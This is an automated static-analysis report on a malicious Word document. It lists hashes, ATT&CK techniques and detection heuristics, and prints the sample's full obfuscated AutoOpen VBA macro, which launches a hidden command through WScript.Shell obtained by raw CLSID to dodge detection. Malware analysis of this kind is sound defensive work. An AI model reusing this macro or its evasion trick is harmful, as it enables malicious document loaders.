Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 6ced06577c7f1068…

MALICIOUS

Office (OLE)

Size: 91.8 KB
Created: 2018-11-27 13:30:00
Authoring application: Microsoft Office Word
First seen: 2019-03-18
MD5: 99b4875f0f3e769dd083f1e33a3682cb
SHA-1: ce3ad435275fe360c6851e209e53cedb86b1aa40
SHA-256: 6ced06577c7f10685b4635d978b31f68bda96bdec6cf691d29d08ad0b49584ed
Risk score: 252

Malware Insights

MITRE ATT&CK
T1059.003 Windows Command Shell
T1566.001 Spearphishing Attachment
T1204.002 Malicious File

The sample contains a VBA macro that is triggered by the AutoOpen event. The macro uses GetObject with a raw CLSID to instantiate the WScript.Shell COM class, a technique that sidesteps ProgID-based detection of CreateObject("WScript.Shell"). The resulting object is used to execute a command that invokes cmd.exe with a complex PowerShell command, which appears to download and execute a second-stage payload from a list of URLs.

Heuristics 9

  • ClamAV: Doc.Malware.Sload-6798975-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Sload-6798975-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA instantiates a dangerous COM class by CLSID critical OLE_VBA_GETOBJECT_CLSID_DANGEROUS
    VBA uses GetObject("new:{CLSID}") to instantiate an execution/scripting-capable COM class by its raw CLSID, avoiding the CreateObject ProgID that name-based detection keys on.
    Matched line in script
    End Select
    Set cnJvbb = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + SQOqEFG)
       On Error Resume Next
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
    End Select
    Set cnJvbb = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + SQOqEFG)
       On Error Resume Next
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Attribute VB_Customizable = True
    Sub AutoOpen()
       On Error Resume Next
  • Suspicious cmd.exe invocation with execution flag high SC_STR_CMD
    Suspicious cmd.exe invocation with execution flag
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main
    Channel: in document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 11448 bytes
SHA-256: 386627124c0c89561318b543e71999b1fa44ba613b5061cb2781b46c24de0892
Detection
ClamAV: No threats found
Obfuscation or payload: likely
141 of 219 identifiers look randomly generated (e.g. 'LnUGccLjbh') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "XiKIjHY"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
   On Error Resume Next
 For Each jBwnIABM In TZwiwXp
         nqniDuTlu = 187303609 + Oct(34826706) - 336618421 - CBool(310486486 / 250832287) * 188401206 + Log(iNHVjU - CLng(270746957)) - 31097637 + Hex(NYVYtzFC)
      Next
      Select Case wzGKdHdC
         Case 90572707
            vNjhwfw = Cos(243796439)
            UJSBiw = 272623684
         Case 142295984
            MBdzwHqiL = Sqr(157041112 / CSng(240795702 - Cos(2056339 - 294441055) + GQIUiqYs + Rnd(325639837 - 92125382)))
            iddwXNnl = Hex(pMuwRcr)
End Select
   On Error Resume Next
 For Each cGEVIfmE In fkjODANjR
         NaJfTu = 202053439 + Oct(12474117) - 241545280 - CBool(40289406 / 181223454) * 307394783 + Log(pYUIJWl - CLng(278494891)) - 173946011 + Hex(CUWrKJYtS)
      Next
      Select Case wkLTb
         Case 246841488
            idBwXkP = Cos(283957038)
            jsENjYnbG = 76358318
         Case 324271425
            UsMMJ = Sqr(305324442 / CSng(150269848 - Cos(33594618 - 88257105) + hXvHM + Rnd(165200992 - 342269374)))
            jHAUafpE = Hex(azjMPo)
End Select
   On Error Resume Next
 For Each jHlnwV In TJOJPv
         wutztbk = 198463702 + Oct(89890341) - 63769765 - CBool(227273320 / 181303980) * 260914280 + Log(aLPRi - CLng(224309549)) - 159991929 + Hex(CilCmHa)
      Next
      Select Case IdTkuwaKs
         Case 132216808
            FtbEWhE = Cos(292900201)
            zrlNGbrPM = 286733362
         Case 271344614
            DNBFIDM = Sqr(199434707 / CSng(245900209 - Cos(32773554 - 163656335) + DTcbZO + Rnd(135842950 - 222648030)))
            dAQsFi = Hex(ELzBiB)
End Select
Set azOisOLu = Shapes("LnUGccLjbh")
   On Error Resume Next
 For Each ohWdo In LOwHhlTS
         LTvOH = 261020459 + Oct(325152602) - 273146137 - CBool(65061902 / 201797274) * 31439376 + Log(JJnUqXlMc - CLng(83289131)) - 58968951 + Hex(GNjLoinB)
      Next
      Select Case UZiDq
         Case 112109720
            qrMwjm = Cos(15622929)
            LnqOh = 37219405
         Case 215552032
            KPHtElAbr = Sqr(19513089 / CSng(268450352 - Cos(267522956 - 235492448) + QAGUV + Rnd(242972158 - 341591331)))
            wUKiA = Hex(rYUCn)
End Select
   On Error Resume Next
 For Each WzItdB In GSsbYW
         onUqBpwLN = 82127321 + Oct(182722426) - 318417404 - CBool(161630097 / 169773907) * 46426675 + Log(BkzCQl - CLng(115674427)) - 290082511 + Hex(iCcTIhG)
      Next
      Select Case WuSwD
         Case 88024544
            RKkvRj = Cos(191032414)
            zzqqbTiCW = 183930242
         Case 133284964
            nWsEiU = Sqr(286412917 / CSng(12240282 - Cos(205554929 - 264621455) + wXjlFBV + Rnd(175740636 - 274962661)))
            LcUSq = Hex(lsswUiua)
End Select
   On Error Resume Next
 For Each DUrwTEjz In utdGj
         XUacqi = 284541472 + Oct(242263498) - 205931359 - CBool(316808315 / 151145728) * 198147936 + Log(acjLQBCo - CLng(317390219)) - 309368363 + Hex(LwKpsbaX)
      Next
      Select Case McwRwj
         Case 38445923
            jLAwaw = Cos(162872676)
            OiNFjdb = 164989841
         Case 283558740
            uXCsDV = Sqr(339118288 / CSng(85721211 - Cos(156183139 - 327241922) + ONkvpEku + Rnd(254153323 - 241723059)))
            lQitN = Hex(kiBXah)
End Select
   On Error Resume Next
 For Each LFwolmvv In VCPQw
         RMHGlvHh = 172364556 + Oct(245096901) - 30106271 - CBool(47692593 / 295793925) * 53344855 + Log(odKmpk - CLng(282762079)) - 81332244 + Hex(TDVnVRYF)
      Next
      Select Case zFcUL
         Case 25781785
            DYYDhfCnv = Cos(218912065)
            FdHwazb = 258975607
         Case 227690224
            TLJMzEv = Sqr(16247464 / CSng(237249542 - Cos(129395595 - 117987158) + vlMSI + Rnd(338101944 - 261575517)))
            isosT = Hex(vBidtYV)
End Select
   On Error Resume Next
 For Each ZoYIow In KTMNEnNMC
         kFYKnm = 307734404 + Oct(306536180) - 322761375 - CBool(200424121 / 164071166) * 186130504 + Log(dBUHUzGt - CLng(74095763)) - 28710613 + Hex(GthkcmY)
      Next
      Select Case sGjRN
         Case 52716451
            BdNrUXil = Cos(236040801)
            jjtPva = 165532235
         Case 5345488
            DuFKR = Sqr(67530268 / CSng(37357891 - Cos(109704046 - 236232111) + wkGziwc + Rnd(205961324 - 129494432)))
            zXIzYsGf = Hex(wjHQKErvT)
End Select
IqGPlb = "" + EjumlNJ + rIiwN + szVdJqY + cowHofw + azOisOLu.TextFrame.TextRange.Text + NcPpXbK + YkJtKJt + rvYiw
   On Error Resume Next
 For Each UKvMwrA In rWtKY
         EclUoWb = 313570060 + Oct(181871167) - 97418907 - CBool(16703311 / 125523553) * 69962090 + Log(fsjKn - CLng(223712250)) - 328101573 + Hex(nQuilloPa)
      Next
      Select Case jjdXJKS
         Case 141411937
            YjjKfjzaz = Cos(260969403)
            WqfIoUaG = 239340730
         Case 275055490
            Lodma = Sqr(158611452 / CSng(53399989 - Cos(228303053 - 164016825) + SlZNGGPBm + Rnd(77667323 - 270228088)))
            rCpEVio = Hex(MlHRXsjs)
End Select
Set cnJvbb = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + SQOqEFG)
   On Error Resume Next
 For Each cvtTwL In NJjGw
         LYuCrlH = 159024179 + Oct(10700977) - 114156551 - CBool(341809066 / 282477380) * 164621820 + Log(rvzqCjN - CLng(124696706)) - 263127870 + Hex(warwct)
      Next
      Select Case lJuPMaI
         Case 206604637
            Mmadtc = Cos(154466760)
            MRKtEOJs = 239146064
         Case 182031833
            RtKvI = Sqr(318116758 / CSng(93471256 - Cos(220057705 - 203674410) + fUrKnW + Rnd(176946168 - 290466881)))
            ZWDJk = Hex(jbhukX)
End Select
   On Error Resume Next
 For Each RSIfc In NGUjlV
         zwIRoU = 80599826 + Oct(183237391) - 31553705 - CBool(81329165 / 263971414) * 296880732 + Log(uVLqUOvl - CLng(249326603)) - 222486499 + Hex(VTirKFZnZ)
      Next
      Select Case pEduoHd
         Case 184610185
            GUmvar = Cos(309704463)
            LWaaNON = 321244076
         Case 138296704
            URwmATDER = Sqr(228133013 / CSng(318446274 - Cos(211971202 - 48582585) + JZbajY + Rnd(28478727 - 770169)))
            cNQzDc = Hex(PzTRIKNTT)
End Select
   On Error Resume Next
 For Each CXBwV In kaFtMwHwf
         aflwWwa = 324539098 + Oct(49932651) - 43332925 - CBool(22781888 / 315330013) * 159627078 + Log(JbPksRB - CLng(164658214)) - 112169473 + Hex(huijPwTMJ)
      Next
      Select Case mkHSjDz
         Case 29336400
            PwoChkli = Cos(156741564)
            NcBOo = 112129135
         Case 183303821
            thLmqm = Sqr(339998788 / CSng(243863181 - Cos(162381246 - 127975718) + DoUzjBAss + Rnd(323943178 - 320308683)))
            NvGwwkV = Hex(BEjDXd)
End Select
   On Error Resume Next
 For Each TonIm In tWwcMYcY
         PWtBIC = 125250304 + Oct(130989533) - 176726412 - CBool(76231135 / 255472242) * 7703190 + Log(noaJz - CLng(139812621)) - 222415354 + Hex(lzAsFQzc)
      Next
      Select Case LvUEKoda
         Case 274867802
            AUNzz = Cos(230820441)
            jHCDYHqfd = 156437253
         Case 295757031
            DmTqr = Sqr(1078841 / CSng(282785419 - Cos(217802418 - 322036063) + AwjJThS + Rnd(162597548 - 12040272)))
            JMhra = Hex(modYhRlR)
End Select
Const QNALk = 0
   On Error Resume Next
 For Each ZNJwEzQQk In jikwW
         zlzToUzSD = 122828394 + Oct(60567217) - 252910204 - CBool(263602756 / 142975945) * 305067718 + Log(RvWFlflJ - CLng(41835121)) - 260224891 + Hex(uoTAhfkJ)
      Next
      Select Case CjFFOqsm
         Case 279794995
            cOMzQpZ = Cos(117476473)
            TAoNA = 265152650
         Case 33399313
            kSbHDMH = Sqr(217042687 / CSng(222626361 - Cos(277506179 - 114144246) + umzScKQiq + Rnd(15883788 - 74507319)))
            NiqnN = Hex(ERIMIUO)
End Select
   On Error Resume Next
 For Each sXwYiL In oRihDLUaz
         dmHNR = 93376792 + Oct(253714629) - 307518484 - CBool(74237928 / 193829837) * 66789526 + Log(rAraBUuY - CLng(189777431)) - 300839240 + Hex(zXjXHVR)
      Next
      Select Case iFCcFpEb
         Case 58795711
            dXikAa = Cos(194570629)
            cJAjYZjMI = 281370206
         Case 246192579
            fYtofioXl = Sqr(243841873 / CSng(320288192 - Cos(295626623 - 245406336) + wWsOWF + Rnd(304762958 - 114381033)))
            IowhdttjN = Hex(ShFdtFSmF)
End Select
   On Error Resume Next
 For Each kOulYZNud In hlzXNHscC
         RjEJuNO = 306484968 + Oct(132938481) - 44678136 - CBool(35345333 / 83726077) * 224459712 + Log(aWFwJER - CLng(64341018)) - 177215773 + Hex(jqdwwrtq)
      Next
      Select Case PZEKk
         Case 284980461
            LSaXuU = Cos(22771959)
            wqCwTzE = 53378240
         Case 36843335
            cDkSvc = Sqr(84568973 / CSng(95069658 - Cos(38439880 - 120234253) + WMVEw + Rnd(300819081 - 335883400)))
            DrMnIzHp = Hex(XJLRwsIna)
End Select
   On Error Resume Next
 For Each WjnHrtjz In twtiSZwQc
         jzQDuAb = 285150139 + Oct(229749691) - 180322033 - CBool(90317939 / 267553921) * 158161488 + Log(OqJVsUOXQ - CLng(273117154)) - 268397469 + Hex(JNPbsVK)
      Next
      Select Case vmGdtHQ
         Case 17151106
            YdEaC = Cos(127044805)
            QdYIPJj = 176228643
         Case 93811891
            qOcHir = Sqr(196789074 / CSng(336729588 - Cos(311422832 - 188211763) + fblDLWsM + Rnd(235709683 - 2301829)))
            tmKPz = Hex(ImFfP)
End Select
cnJvbb.Run! IqGPlb, QNALk
   On Error Resume Next
 For Each vqpRq In CnDzOUKP
         izPLb = 22952866 + Oct(182007354) - 251401169 - CBool(148832178 / 249306598) * 317170046 + Log(ssoXJfjzv - CLng(337107283)) - 216716594 + Hex(IqlPwd)
      Next
      Select Case QviWj
         Case 16564019
            zBUETfu = Cos(260597063)
            vObEo = 172403376
         Case 120183546
            jSADk = Sqr(120851400 / CSng(77609858 - Cos(273243294 - 294873424) + fEOVIUij + Rnd(223313306 - 194652135)))
            jBUUjpAUZ = Hex(qdXnNB)
End Select
   On Error Resume Next
 For Each CIwoIj In UpKGzuGiZ
         ErLnM = 274016439 + Oct(302504047) - 128273537 - CBool(257595962 / 327257783) * 98426118 + Log(zTNQGQI - CLng(282746216)) - 248467681 + Hex(wwwUIrXh)
      Next
      Select Case UfcfXjZqS
         Case 27785080
            Vlhtsqt = Cos(220975559)
            pZiXWtNp = 289063528
         Case 220463383
            vFwuw = Sqr(138315026 / CSng(262679293 - Cos(276609647 - 214655008) + apmQNMQF + Rnd(184558607 - 115948183)))
            quJuwFJiW = Hex(wlBZPnmw)
End Select
   On Error Resume Next
 For Each YQbbLniDc In jUWkQNHA
         qSdfIwU = 120577970 + Oct(271992514) - 299032766 - CBool(316893345 / 78029511) * 137516407 + Log(EknqNBNQd - CLng(178955119)) - 273131765 + Hex(LCBdwPS)
      Next
      Select Case CbvlTdrUp
         Case 69591062
            ULURzcWt = Cos(334535781)
            ZoBqmm = 121311512
         Case 109292434
            wjsazc = Sqr(273330737 / CSng(12088428 - Cos(151481683 - 239703604) + tbTuVJ + Rnd(283690798 - 239875226)))
            AaVUd = Hex(ntvhqYE)
End Select
End Sub